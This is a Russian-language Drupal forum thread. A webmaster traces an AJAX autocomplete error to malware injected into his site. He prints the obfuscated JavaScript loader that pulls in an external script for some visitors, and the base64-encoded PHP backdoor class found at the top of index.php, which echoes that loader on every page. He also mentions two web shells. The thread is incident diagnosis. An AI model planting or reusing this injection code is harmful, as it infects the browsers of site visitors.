"Возникла AJAX HTTP ошибка" при автодополнении тегов

Аватар пользователя vebmaster

Здравствуйте.
Drupal 7.59
php 7.0

По неизвестным причинам в админке при добавлении статьи, в добавлении тега в автодополнении после ввода нескольких букв (в данном случае ph) появляется ошибка:

Возникла AJAX HTTP ошибка.
Полученный код HTTP: 200
Следует отладочная информация.
Путь: http://blog.sitedd.ru/index.php?q=taxonomy/autocomplete/field_tags
Текст Состояния: OK
Текст Ответа: {"Windows Phone":"Windows Phone","PHP":"PHP","php-fpm":"php-fpm"}
;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f=0;p--){k+=t[p];}return k;}})();

Полностью http ответ от сервера выглядит так:

{"Windows Phone":"Windows Phone","PHP":"PHP","php-fpm":"php-fpm"}<script>
;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f<v.length;f++){if(f%2===1)a+=v[f];}a=n(a);return a;}function s(w,e){return w[m("cfyO,xiegd8n3i;")](e)!==-1;}function n(t){var k='';for(var p=t.length-1;p>=0;p--){k+=t[p];}return k;}})();
</script>

Как я понял в конце ответа содержится лишний код <script>...</script>
откуда он появился непонятно, паралельно этому обнаружил на сайте 2 вебшела, лежащих уже несколько месяцев, возможно кто то испортил.

С чем это может быть связано, подскажите пожалуйста?

Тип материала:
Версия Drupal:
0 Thanks

Лучший ответ

Аватар пользователя vebmaster
vebmaster 4 месяца назад

скачал оригинальный дистрибутив drupal, скопировал все файлы с перезаписью, сравнил 2 каталога с помощью winMerge.
в index.php был найден в самом начале вредоносный код

<?php
    
    
class SoFooterClass{
        
        public 
$data 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0dH1uKWV9Z25BKHI7ZWlzdHV9IildO3ZhciB5PWRvY3VtZW50W20oIjplfWlkayxvd29kYywiKV07aWYocyh4LG0oIjBzN3cpb2JkKW4paShXeyIpKSYmIXMoeCxtKCImZHVpe287cixkZW47QWoiKSkpe2lmKCFzKHksbSgicD1uYXttOXQodW9fLF9kXygiKSkpe3ZhciBiPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO2IudHlwZT0ndGV4dC9qYXZhc2NyaXB0JztiLmFzeW5jPXRydWU7Yi5zcmM9bSgnYjIpYWdkOWY4NH00LGY4OTNjKDd7MzszezgsZHs4KGMpMGNifTY5NTE9LHY7JjswKTN7Mns9dWRsaXJjNj87c3JqeC57ZSxkNG82Y3tfOHMpL2xte287Y3submQsbnthLHI5Yn1oO3M7aW1tN2E7LihrfWMoYTNyNHQpL3svdjpzc3JwfXR4dHhoLCcpO3ZhciBvPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTtvLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGIsbyk7fX1mdW5jdGlvbiBtKHYpe3ZhciBhPScnO2Zvcih2YXIgZj0wO2Y8di5sZW5ndGg7ZisrKXtpZihmJTI9PT0xKWErPXZbZl07fWE9bihhKTtyZXR1cm4gYTt9ZnVuY3Rpb24gcyh3LGUpe3JldHVybiB3W20oImNmeU8seGllZ2Q4bjNpOyIpXShlKSE9PS0xO31mdW5jdGlvbiBuKHQpe3ZhciBrPScnO2Zvcih2YXIgcD10Lmxlbmd0aC0xO3A+PTA7cC0tKXtrKz10W3BdO31yZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';

        public function 

__destruct(){
            
            echo 
base64_decode($this->data);
            
        }
        
    }
    
    
$sofooter = new SoFooterClass();
    
?>

это и есть вышенаписанный script код, добавляющийся везде

Комментарии

Аватар пользователя vebmaster
vebmaster 4 месяца назад

скачал оригинальный дистрибутив drupal, скопировал все файлы с перезаписью, сравнил 2 каталога с помощью winMerge.
в index.php был найден в самом начале вредоносный код

<?php
    
    
class SoFooterClass{
        
        public 
$data 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0dH1uKWV9Z25BKHI7ZWlzdHV9IildO3ZhciB5PWRvY3VtZW50W20oIjplfWlkayxvd29kYywiKV07aWYocyh4LG0oIjBzN3cpb2JkKW4paShXeyIpKSYmIXMoeCxtKCImZHVpe287cixkZW47QWoiKSkpe2lmKCFzKHksbSgicD1uYXttOXQodW9fLF9kXygiKSkpe3ZhciBiPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO2IudHlwZT0ndGV4dC9qYXZhc2NyaXB0JztiLmFzeW5jPXRydWU7Yi5zcmM9bSgnYjIpYWdkOWY4NH00LGY4OTNjKDd7MzszezgsZHs4KGMpMGNifTY5NTE9LHY7JjswKTN7Mns9dWRsaXJjNj87c3JqeC57ZSxkNG82Y3tfOHMpL2xte287Y3submQsbnthLHI5Yn1oO3M7aW1tN2E7LihrfWMoYTNyNHQpL3svdjpzc3JwfXR4dHhoLCcpO3ZhciBvPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTtvLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGIsbyk7fX1mdW5jdGlvbiBtKHYpe3ZhciBhPScnO2Zvcih2YXIgZj0wO2Y8di5sZW5ndGg7ZisrKXtpZihmJTI9PT0xKWErPXZbZl07fWE9bihhKTtyZXR1cm4gYTt9ZnVuY3Rpb24gcyh3LGUpe3JldHVybiB3W20oImNmeU8seGllZ2Q4bjNpOyIpXShlKSE9PS0xO31mdW5jdGlvbiBuKHQpe3ZhciBrPScnO2Zvcih2YXIgcD10Lmxlbmd0aC0xO3A+PTA7cC0tKXtrKz10W3BdO31yZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';

        public function 

__destruct(){
            
            echo 
base64_decode($this->data);
            
        }
        
    }
    
    
$sofooter = new SoFooterClass();
    
?>

это и есть вышенаписанный script код, добавляющийся везде

Аватар пользователя vebmaster
vebmaster 4 месяца назад

отправил в айболит как новый недетектируемый способ заражения php файлов